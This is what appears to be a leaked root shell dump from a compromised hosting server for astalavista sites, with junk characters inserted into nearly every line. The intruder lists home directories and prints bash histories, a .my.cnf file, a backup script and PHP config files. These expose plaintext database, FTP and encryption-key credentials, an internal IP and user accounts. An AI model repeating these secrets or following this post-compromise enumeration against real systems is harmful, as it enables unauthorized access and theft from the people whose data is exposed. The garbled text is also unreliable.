( D' T$ |$ z8 c `5 x! G# Available ShortCuts #- h; m7 l* d, I. k
# #
! R/ R" c* z: l) G# nst - list active connections #2 t d* _( J( [( W
# ddos - shows how many times each ip is connected #" V+ d; n# o1 h% c
# ltr - restart the webserver #$ { B2 U* `/ a
# phpc - edit the php config file #( G4 g" o. |# u
# htc - edit the webserver configuration file #
+ ?! ], r. |1 i" _" {$ ]& q& a# up - uptime #
9 Q9 i u; F1 `& B% D# etd - edit the motd of the day file #5 [5 K" J8 j" l
# htr - start and restart apache if needed #
) l- p8 b, t0 }$ B9 p& ~# syng - shows active SYN_RECV connections #
5 L1 |' Y2 G& R9 r# J( b# synd - syn flood blocker - “synd -h” for usage #7 O$ `; E7 e$ R6 b( O7 p+ k
#####################################################
( ]/ D$ {1 D. d1 J! \( L# K1 v2 M# NOTES: #4 l2 z* ~3 i: l
# Last Upgrade - 12-08-2008 by JF #
, ^5 n) Z+ _' z$ G# My.cnf/Mysql Optimization - 1-28-09 #4 ~3 | v/ j d& _
# # {+ y7 j- g* g; U
# #5 o2 i& W6 }8 {( g. w
# #
5 C8 I9 l2 ]8 _: u Z! h#####################################################
1 k* p+ P3 X/ y, V
4 Q; r* z& t' T$ Osh-3.2# lastlog | grep -v Never
- }' a3 t/ q1 n/ A6 ~Username Port From Latest
% ?- @( N7 u( a' o1 a% xroot pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
S$ W: f p+ V6 Qadmin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
2 T* r. q1 p4 P1 ^& [. D; M) j# Lcom pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009/ @% X% n' ]: _! X% U8 I, i9 b
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009 \, a0 J8 @& y
' B% U$ I( p1 T' t) a. Q7 Z9 \sh-3.2# ls -la
4 Z6 l( q; x: Y6 y( A2 @. I: ]total 453376
, u: n3 i: I3 q, c/ ?drwxr-x— 15 root root 4096 Jun 4 08:40 .2 f$ M' u" L8 F; F
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
# g0 x6 s1 y( q+ Y5 i! q4 N; J-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip7 H* r, E- r( `+ `3 f
-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg& p- x# b4 J2 b
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history2 z5 A1 k+ v3 |2 P' i2 y: i2 D
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout$ w# r) {# E7 v
-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
7 K7 R$ `4 ^9 [7 D-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
. F/ N3 Q; N: d" P* V4 @7 @-rwx—— 1 root root 1899 Oct 28 2007 bk.sh9 J: A: H8 F0 o5 q9 o9 T
-rw-r–r– 1 root root 1327 Nov 29 2007 cert6 C1 N. P& I0 @2 j0 d& ? n
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql& f- N3 [% r8 I
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan
3 M H5 C( @- d+ s8 G3 W) z. [( ]-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc$ t4 X/ x' h8 p, {1 S6 l/ L
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
8 j* y: q- e4 [" q3 @ udrwx—— 2 root root 4096 Oct 28 2007 .elinks% Y7 ^3 b. h+ E
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
2 F* ]) @2 R. j" y-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
7 @$ k/ `4 J" N y! c% ]* V-rw——- 1 root root 0 Apr 16 13:19 .history
7 s" a; K2 D. P0 f6 D+ I-rw-r–r– 1 root root 16095 Sep 11 2007 install.log- ^9 h6 s( e9 P4 x) j/ T' B, i
-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog C4 [) w2 h+ T, b+ i9 t- T( Q
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
* l9 B0 g" b# L-rw——- 1 root root 35 Jun 2 14:23 .lesshst# t& b' e9 x! a- w' L, r
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
I @0 o# s; tdrwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
- Y) Z* u1 A6 D7 P* D5 o-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
# H* j" y# q" `! M# Y& N4 ?& h% `; r-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz20 n) B8 q1 n. p' s5 G
-rwx—— 1 root root 760 Sep 18 2008 lp
8 p: ` P0 G: [/ udrwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1* l% j0 r/ G2 ^, f% ~9 l1 y( J/ N
-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz9 u4 b+ o2 s$ Y" \7 z/ E
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.17 r4 I4 L6 |3 d
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9" D' ^4 I7 J# W" o
-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
! S" e6 S3 u9 V! f, a- ddrwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3% s) ^7 v4 o: {; G% v( @
-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz' r& i9 V9 W ~5 u6 g: R" y$ M
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
2 Z0 q6 x4 g5 c8 p; T k-rw——- 1 root root 41 Oct 19 2007 .my.cnf
! ^' v* a' h w* O, _-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history* v2 O& b7 |% S
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport
% v: n1 |* q: h+ G& n" N-rw——- 1 root root 41 May 20 2008 .mytop' n. `5 A( X4 Y( _; [- p
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.66 K4 F4 t2 t/ G7 W2 _/ {1 L
-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
' O: b% o' T+ z2 v4 T7 y7 Kdrwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp/ C; y% N/ }. h1 ]; K
-rw——- 1 root root 1462 Sep 21 2007 opt.php
" L* y# ^0 d& D* X-rw-r–r– 1 root root 3371 Sep 22 2007 p
# I# w) z J, B-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
: u0 \6 v, T# E-rw——- 1 root root 1024 Feb 3 21:32 .rnd
( m; z1 Q% B' M0 w-rw-r–r– 1 root root 716 Nov 28 2007 server.csr/ e, B& m7 P0 L# L
-rw-r–r– 1 root root 887 Nov 28 2007 server.key
# e& d* V) X- odrwx—— 2 root root 4096 Oct 10 2008 .ssh: T* w) Y7 c; d' D
-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
6 \$ R: f9 r, G-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc
- Z ~8 F$ \5 L4 x) p-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
* q1 t, F, ^% c: u0 M-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1% i9 z" v5 w/ i8 |# I K! d$ X
drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp5 q/ X% \5 U; S' q
-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh: I& C+ @0 r: A
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0! ?- T. V: P+ j+ m' S
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
/ P! c4 A& ?+ P$ @) F6 ^-rw——- 1 root root 12997 May 16 2008 .viminfo! F3 O9 F* D1 z; h! U$ k
' S& f! E: C6 t7 G
sh-3.2# cat .bash_history, |9 Y# ^4 Y7 v! M% {
[snip], K) P! w; w" g# O$ ]: _2 G
wget cp4sst.com/sstlinux.tar.gz( [3 |; G6 S3 `% ^5 y3 b
tar zxvf sstlinux.tar.gz4 c" o5 o s& r+ o' J+ i) [; z* z: }. q
cd linux-2.6.27.10
7 L( W) z* ^# ysh install.sh
/ [2 ], P* V. j; Vmake bzImage ; make modules ; make modules_install ; make install. `! E* Q0 R4 h# c0 T/ f6 J: w% U3 W
make clean
/ a2 \/ {4 }6 ^service mysqld restart/ Q+ B6 G; }! j! j! F7 u7 D ?
[snip]3 y4 b, s# S, z& C6 [
cd /usr/sbin/! F% a8 i! r: }
chmod 4777 traceroute4 X' j) S S2 e* G, y
chmod 4777 ping4 k2 [6 M% f/ W; p
traceroute -I 链接标记[url]www.astalavista.ch[/url]. H# E' ?( o6 w1 b2 r/ o7 S; L; V
[snip]8 U2 c3 E' O; R6 i; i, ?
vi /etc/csf/csf.conf& H- y! x; }: M4 @6 h
traceroute google.ch
' |5 v- a D3 u0 A% n, ^: a" [service csf restart
8 t7 f( o; s6 r1 w; G Q# Ttracert google.ch
; p5 p! a2 j6 q: @+ E& H3 Z; Lservice csf restart
: e' ^1 K& P9 c* htraceroute 链接标记[url]www.google.ch[/url]
7 \5 G; p0 a3 K" d& H) [3 E: ~- Jtracert 链接标记[url]www.google.ch[/url]
+ U# [( j0 ~. \8 n. rtraceroute 链接标记[url]www.google.ch[/url]
B0 A' _% \& W2 }' J) D4 glocate traceroute
8 l9 T( Z% ^1 [) Ychown 4755 /bin/traceroute1 I/ H( N& g0 ^1 a1 I$ {
chown 4777 /bin/traceroute; J5 t2 o) F1 k! A# R
locate ping4 {8 o' Q5 |+ w" c3 A$ Z; p# E
chown 4755 /bin/ping
4 i' `3 }* x, m: b- c+ Ichown 4777 /bin/ping2 j) h0 @1 u" P6 G, x; T
cd /bin/
5 V' J! w0 o. c( R7 ?# H" q/ rls -ali | grep ping1 z; S: m( v, [. E9 R
chown root ping
I; V- w/ c7 B, ^chmod 4755 ping a! E% w/ M2 m! J2 I, e0 W/ X
ls -ali | grep traceroute3 A8 p P# W; ^5 n$ B% S/ f
chown root traceroute
4 P' z# \) c& D) R) W. X# X& ochmod 4755 traceroute
( z* v% S- U' A6 ? y3 wls -ali | grep traceroute y* K5 d; T& d( ^! D
traceroute -I 链接标记[url]www.google.ch[/url] ^; d: R8 y$ y
traceroute 链接标记[url]www.google.ch[/url]' }; ~6 T* T3 U+ ?3 y
whois pmsantos.ch
5 R& R; D# ^# Q) B2 {[snip]% \5 I) i/ o' i/ d% Y5 a. A
mysql -h com_contrexx2_live < /root/defaultp_ports.sql
5 ?6 P0 p& j' Z; d ?! x' Pmysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
2 i, X* u% c; B3 T* U5 M ?mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql/ p8 f; Y+ f2 U5 N! b) ?! |( T' e: A
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql% Z2 Y) [. L: P" o$ e
top, C* r, o: N' L
ping ssth.ch9 M: w# T" G4 ?/ |0 m
ping asdlkfaljgasd???ljg???lasj.ch
& Q+ Y) b2 R; z5 h6 m7 p9 _ping asdlkfaljgasdlasj.ch
0 y# i2 o% v h0 ?6 k& _ r$ Vping 链接标记[url]www.ssth.ch[/url]7 f2 a$ c5 j8 x; g" W( ?3 a$ }
ping ssth.ch0 C2 O! @' D* x, d( R1 y% ?8 w! S
nslookup 链接标记[url]www.google.ch[/url]
$ U9 {3 ]* K& Nnslookup 链接标记[url]www.ssth.ch[/url]
- a/ j! B/ v0 B2 j1 Mman nslookup" C* U+ D2 J- [0 Q# N0 @
ping 链接标记[url]www.google.ch[/url]% L( Q. W) { g, {; N% x% L. E! l
nslookup 链接标记[url]www.google.ch[/url]+ G" n( m4 X) O" i' T) ~2 [
nslookup 链接标记[url]www.google.ch[/url]
1 W& a5 C' x0 A% w8 v& s& v6 jnslookup salfjasdlf.ch. m. W. b- B' g: ]& M7 C/ y
[snip]
' \2 ^( Q4 O1 t/ Jopenssl passwd -1 sadf
- {* g$ P8 k3 I* D( z, z; ] D4 Copenssl passwd -1 5cZNHstdTy
+ Q4 _5 c7 j) S/ C5 q9 [mysql
; I, `' |! @9 _: M9 Q4 O% @2 N# mmysql: A; V+ x3 K& w. [! E* E7 v. _: S
locate proftp
I n; E0 b9 d6 }' I+ Hvi /etc/proftpd.passwd. [" O8 p+ e1 y: h
service proftpd restart, v& M2 v0 f( l |! X& J
locate proftpd.conf. R- I+ f$ y* N1 {: i
vi /etc/proftpd.conf
1 {1 _# ]+ a d8 e, A, wvi /etc/proftpd.passwd5 K0 l( [7 R8 e. a( g; j0 x ]: L
service proftpd restart v6 t( l4 M+ b$ U# f1 m. I- N" H
[snip]. f& O4 M5 p# t; V: v9 T0 M, q3 R! V
/bin/sh /home/com/backup_system/backup.sh0 Q" [% ]' j9 o; Z
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
; k: D7 C# |# E! Wmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql8 v7 s4 t& w }( \
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql; Q- f: V* T( _7 P$ Z' O2 |
ls -ali
0 `2 B5 T% `8 ]6 {5 Hmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql0 n: s7 K, }$ U* `
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql$ A5 ]' n7 [3 a4 H; G0 ?5 W6 p
crontab -l
# M- }7 f- o8 T) a2 K9 Fcrontab -l- @ N' }, E0 D+ _# e
php -q /home/com/public_html/modifications/cronjobs/securitynews.php
7 k- ~. S4 W# T1 C( f/home/com/public_html/modifications/cronjobs/exploits.sh5 d$ [6 ~; F* S$ ?' x) b
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
( O- k5 f% e' Q' r' }, G2 j1 star zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
+ ^; O4 I+ ?" H* R% D$ @( ]cd lsws-4.0.3* Z& B9 ^3 V( D: |" e( n
sh install.sh# t. x' ~$ O- P0 T* f, k. d
uptime
8 a) H. S, o+ Q& K' jhdparm -tt /dev/sda1 g0 @! K8 [) g# p1 G; a0 b
iostat
9 }/ P7 M- O0 M& Y( d8 R3 G- {yum install iostat
) x5 S% F' S7 G+ \" R8 i; Wiostat6 o: ?! J! x4 F* B& L
whereis iostat
1 P/ F0 q+ x! i) I- i+ |; {yjm clean all
, @ a @% v% @/ S. g( u" Dyum clean all ; yum -y update( z# b( o" Y" O4 ~, p6 w
iostat
, O/ }, [; N% K4 P4 c5 m5 syum install systat. l. g0 q7 V* i: B$ J
rpm -qa | grep iostat
( @; \! O1 S) R& s) z; Mrpm -qa | grep sysstat
$ Q2 H' e: H2 ~# j! i/ Yrpm -qa | grep systat- o( }" S" Y* b
dmesg -c
: V& D6 D9 O- _' nsysctl -p8 }0 R0 |+ R0 _8 G7 ], E6 E9 r) }8 s
uname -r
/ F4 p) F7 y2 x pcd /usr/src0 z9 l) e+ p! R( ^& k0 l
wget nix101.com/kernels/sstlinux.tar.gz
6 p1 T; R: ~; z+ Zshutdown -r now
0 b0 B/ W C) z6 J8 v/ Z0 C1 mnano -w /boot/grub/grub.conf W/ G1 ~5 Q! F2 G2 Y) c8 ]
9 |% s. _: G% ~ A2 D
sh-3.2# cat .my.cnf8 @4 \" m4 E" k* f" S* D+ e; t6 U
[client]) y. q0 K! z+ u7 g* A' ~! Z
user=da_admin
r- v: ?8 b" ?password=X9dctmRH4 G0 u' n' c0 \
$ ^% r7 g+ [1 f% G0 \sh-3.2# cat /home/com/backup_system/backup.sh- V# w h/ x4 ~, ]2 ~: Y
#!/bin/sh
0 i5 P- L- k9 I z9 Q. \#####################################################################" c! Y" s$ d) R W7 S- P
# #
0 s9 \ V! D* }3 H( X3 T) E# P# incremental backup for astalavista.com #8 f1 g7 J( ^5 M0 y1 \! C$ r+ }
# #
2 S/ @1 |: B: u2 s2 o# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #% ^9 q# l, ]/ ^& @8 s2 h/ X
# #
' [0 I# b& h3 w8 m. ?0 j) |#####################################################################
5 j8 B7 V& F! I, m5 \1 N( t" K e[snip]
7 V) `# Z I0 U% k2 R1 z; BPROG_DIR=”/home/com/backup_system”;9 K3 o" p. s6 Q; a& o$ W. K/ ~
BACKUP_DIR=”/home/com/backups”;
5 O6 V! L& {1 G- t% }! C. u% B2 HDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;' c5 D0 r* I3 Y: a/ O8 h; U. Y
# ftp for synology backup server
& j. d5 ?* B# G" ]5 KFTP_HOST=”212.254.194.163″;, L6 \' B' N0 l3 a G$ L0 S8 H
FTP_PORT=”21″;
" K+ [2 x7 ]) Z3 T0 x1 m+ PFTP_USER=”astalavista.com”;
# l, F- }# m: y0 z. r* k( M/ dFTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
+ u1 ^* m. Q, F4 k4 O' C9 e3 ?+ gFTP_DIR=”/astalavista.com”;" d6 u; g; _8 M+ [( }( j
# database
! S# q- L# C) B6 k/ yDB_HOST=”localhost”;
% a6 ^8 n# v+ |) M, h2 I! NDB_USER=”contrexxuser2″;+ C+ v7 P% s2 m: T3 w/ Q% W
DB_PASS=”0fEYNZgXz1pKe”;& K* s$ W( {! ?& k/ Q
DB_DATABASE1=”com_contrexx2_live”;, t! K3 ~ x" l" i% y9 Z
DB_DATABASE2=”com_contrexx2″;3 G2 W" a. f1 V. a
[snip]
0 {. E7 k# J) _/ _! qftp -in $FTP_HOST $FTP_PORT <<EOF
0 K0 M ~4 n/ W# o; \quote USER $FTP_USER0 \5 W+ T2 v; n5 W. @
quote PASS $FTP_PASS# I9 e/ Z3 D- [3 u4 _& K
cd $FTP_DIR5 s1 `# z6 V/ X& ?9 Q& x. ~+ t8 A
put $DB_FULLNAME-SQL_Dump.tar
) z* q0 T f2 ]put $BACKUP_FULLNAME-Public_HTML.tar
9 q: q3 ~* B* d8 Sclose
7 r% A7 o/ \3 ibye
, j* A6 G/ T: a$ C, tEOF, X% i+ ]7 V7 S) @: s
0 k! {: x5 D, d1 D# i: Fsh-3.2# cd /home
7 ^: B6 o% @- h9 A: W" K" w1 Lsh-3.2# ls -la: [0 v0 X6 I( u7 w5 \) A7 f0 g* V* Y: D
total 120
& O b) h1 K3 y5 l" pdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .
5 p& M( F8 g4 v% r* zdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
* w4 [4 s4 Q. ddrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
* W7 ?) n, e" x6 c$ G2 A2 e-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
4 Q* c! u I( I C$ |-rw——- 1 root root 8192 Jun 3 02:45 aquota.user Z8 H& Z4 O# H, A
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet) X5 a% o x6 v: D
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup7 z8 L) `7 ]2 n- m( Q5 D( a
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161- W* W2 t: K; h6 p
drwx–x–x 10 com com 4096 Apr 28 12:40 com7 s t* Y: v$ P9 T
drwxr-xr-x 2 root root 4096 May 17 2007 ftp% |# \$ ~- N% G8 _
drwx—— 3 jon jon 4096 Sep 21 2007 jon3 z1 z& {& p' S) j6 q J; O
drwx—— 2 root root 16384 Sep 11 2007 lost+found* e+ l6 y; a( I4 o2 k
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
% S$ |* N$ W- h1 Z9 T; P$ l' t i/ odrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
$ `( Q( ?. E. ^drwx—— 2 jon jon 4096 Sep 15 2007 test2 F8 H/ z0 [: O9 O6 H
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp; }5 P6 m; j: c. I( x
! U( l( h1 \& s2 x+ z, `7 psh-3.2# cd admin
& }* D) G* T- ?0 m, esh-3.2# ls -la" G% [7 I' C/ r$ I5 j, G
total 1735896. p* v; m- r$ C( [3 [
drwx–x–x 9 admin admin 4096 Nov 28 2007 .
- A) ?9 G; F S8 C4 p- `drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..8 d* S3 F4 U6 W
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
$ p+ E' W; A) i. c: F+ W) wdrwx—— 2 admin admin 4096 Sep 28 2007 backups
4 j+ B: h: O( E1 }# S8 N-rw——- 1 admin admin 860 Sep 17 2008 .bash_history2 F( |2 _0 e. V* G' I" D
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
4 A' Z _5 J( G! t/ f2 }+ d9 f-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile$ Q( i: a( p8 B4 U4 Q! |4 y
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc9 q" F& B/ R/ ` j2 b+ Q6 f
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
! m" D; B" e, N) {6 Hdrwx–x–x 6 admin admin 4096 Sep 21 2007 domains, ]. g# K+ W9 ]' s$ W* }4 r, o
drwxrwx— 3 admin mail 4096 Sep 21 2007 imap. o* N9 H: ^& q* w
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
: L i1 B* h/ `/ I, sdrwx—— 2 admin admin 4096 Sep 21 2007 mail
3 S1 R c% } u8 X8 f; K5 D-rw-r–r– 1 root root 716 Nov 28 2007 server.csr5 f. P. v' y- y: C2 Q
-rw-r–r– 1 root root 887 Nov 28 2007 server.key6 R6 }% b; W4 Z$ N
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow
Q( d6 r) _3 R3 K; C-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz0 u8 \5 P0 C! i6 C% i u
drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups
) ~' e7 G0 S5 b- ]3 \6 \
- m$ O+ f/ l" Q; b! G" Y# {sh-3.2# .., n+ O& `* ` ?- W
sh-3.2# cd jon
% C3 n9 G7 N1 M5 \& Jsh-3.2# ls -la' f1 y0 m1 W3 f" a% z. d
total 360 ?" ~1 G! f1 T i( W
drwx—— 3 jon jon 4096 Sep 21 2007 .
0 [, L( v3 ?. z9 ]* n* Sdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
" S! h3 p) J% y2 R+ y4 v6 `-rw——- 1 jon jon 53 Sep 21 2007 .bash_history# R% f) B0 {* c
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
/ X) T5 V5 n/ s0 H, V$ i6 n-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile! [3 Q e* Y( V7 E8 c1 R6 s% M6 _) J
-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
* ]* m' w6 F' q. i-rw-r–r– 1 root root 24 Sep 21 2007 info.php
4 q5 ^! M; L! H4 {' X8 j% O; Ddrwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html8 O' E9 j- v# [" o( S
. a; I& U1 @2 `* R5 Jsh-3.2# cd ..
6 Z8 E7 }# b2 |- @* u; [sh-3.2# cd test
/ S- O! l# C: jsh-3.2# ls -la
r! n8 n6 J |" R5 Itotal 48
7 j6 r1 ]/ G$ ]drwx—— 2 jon jon 4096 Sep 15 2007 .
6 C4 p& Y% ~/ r) I1 |1 wdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
0 g$ @# k8 l+ P% o5 t( n-rw——- 1 jon jon 79 Sep 21 2007 .bash_history' L h! S+ a5 C: h
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
8 R) K7 V0 u" h9 {" Q; g-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile6 [. u, q# ?6 P
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc
& b2 i/ j7 l0 m1 o9 ? l Dsh-3.2# cat .bash_history
+ ]# D& f( R( F) ^+ Z$ ]3 s/usr/bin/mysqladmin -u root password PoliuJhytg67$ E! Y" ]9 F+ k. J7 g; g
- w! K/ u# Q" ` K& vsh-3.2# cd ..
' S | |" G- \" f: ^# W, msh-3.2# cd astanet
3 H, k2 y6 [1 f0 j1 C psh-3.2# ls -la# Y" |( l7 k( v% O
total 52
2 J- h: Q. h# q+ G' B5 w8 B; Kdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ./ Z4 r# k3 K; S; [8 T* ?
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
% y: n$ a: H, v# A8 x% }7 t* udrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
* X! ~* C( l% s1 M! r' x4 o5 N-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
s4 w: _. {1 L* _! E2 R% C-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout* f: ^# ^9 Y. e7 S8 T# v1 O7 m
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile( @( s6 P3 ?8 t3 K; l' {
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
9 q6 Y& G' F, s% N- [, F* s; {drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains3 [' n/ z9 d2 l
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
6 |; H8 O8 k% \% \' Edrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail: p; t, F8 n5 g# ]0 d6 }
-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history
b+ L/ v7 f# I& g, Z) z0 tlrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
7 q& P }" @3 S) A8 p T-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
. K* e; c% B) n3 f) r4 O. H0 c2 \- ^
sh-3.2# cd auth/
6 U/ t# m$ ^. rsh-3.2# ls -la T, W3 O* x* ~) e% b2 {
total 28& [- Q0 w; A) E( [
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .
& [2 O4 n+ P d& ~8 ]# ydrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
7 L1 s c8 e1 v; _# f6 j-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
! t" u: p% Y" n+ s0 s+ e-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php2 u6 e! Z! A. Z/ V4 D7 o9 t5 k& h
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd
' C* x, x/ a2 L7 H1 n) t2 u-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting& p: [$ {! r4 Q% n5 ?% x2 E* ^1 t
-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd V% U7 l: n; F8 y1 f [% j7 X
7 m( N9 a8 z O- r+ S' w9 X% e- B4 Z
sh-3.2# cat hackercontest.config.inc.php
3 a# Z. Y. g3 z<?PHP0 p Y6 ^5 x+ w/ @: L
// Variabeln f?r Verbindung zur Datenbank //6 s6 H& c$ A9 s: N
$conxHost = ‘localhost’; // MySQL hostname
* g# F; A* j1 Y/ o, Z. l$conxUser = ‘hackercontest’; // MySQL user
3 K0 x" C8 S' L c# ~$ f$conxPassword = ‘K6m@7dUc’; // MySQL password1 D& C' U% B1 q# |6 |! f
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish8 L2 n x. o) e9 r( r( v# l
?>" b2 p" C) D! e0 g8 O
sh-3.2# cat hosting.config.inc.php# Q1 @3 U4 p! N& z( W6 `4 F* z# A
<?PHP
9 K- @, P6 a0 u6 u9 Z8 M* X2 v& e& y, Z// Variabeln f?r Verbindung zur Datenbank //
+ O/ F# n6 `6 ?0 u, {$conxHost = ‘localhost’; // MySQL hostname/ Q8 O' ~& r$ K& l' s5 ]) N- r
$conxUser = ‘hostinguser’; // MySQL user
# g% Q U# s, H: l' Y9 M- l. W: K0 v8 K$conxPassword = ‘cXvB3981′; // MySQL password
1 Y4 [ P3 @4 b; k$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
x2 I& T# q2 ?. ~; X v?>
! C h; w5 q3 r8 d5 @2 J1 L# _5 H6 A4 c; W
sh-3.2# cd ..
# n: S! ^! U8 ]2 \6 Esh-3.2# cd com9 t" g, ~$ r. {2 M9 B. r1 R
sh-3.2# ls -la
9 L( k y+ G2 e; }) g& V' I- Z9 Xtotal 141208( @/ x3 Y: S8 T
drwx–x–x 10 com com 4096 Apr 28 12:40 ., W# f" k) z3 W4 @2 B
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..3 E0 P5 w2 \/ U! x% o0 J! I
drwx—— 2 com com 4096 Jun 4 04:04 backups
8 |( u% H" v1 i( c8 J& A-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
+ W7 T* Q# f' h7 b m2 Fdrwxr-xr-x 2 com com 4096 May 12 15:20 backup_system& }7 ?8 b- `+ i" J
-rw——- 1 com com 21880 Jun 2 08:07 .bash_history, j* L' @7 i$ s O |7 i# r
-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout
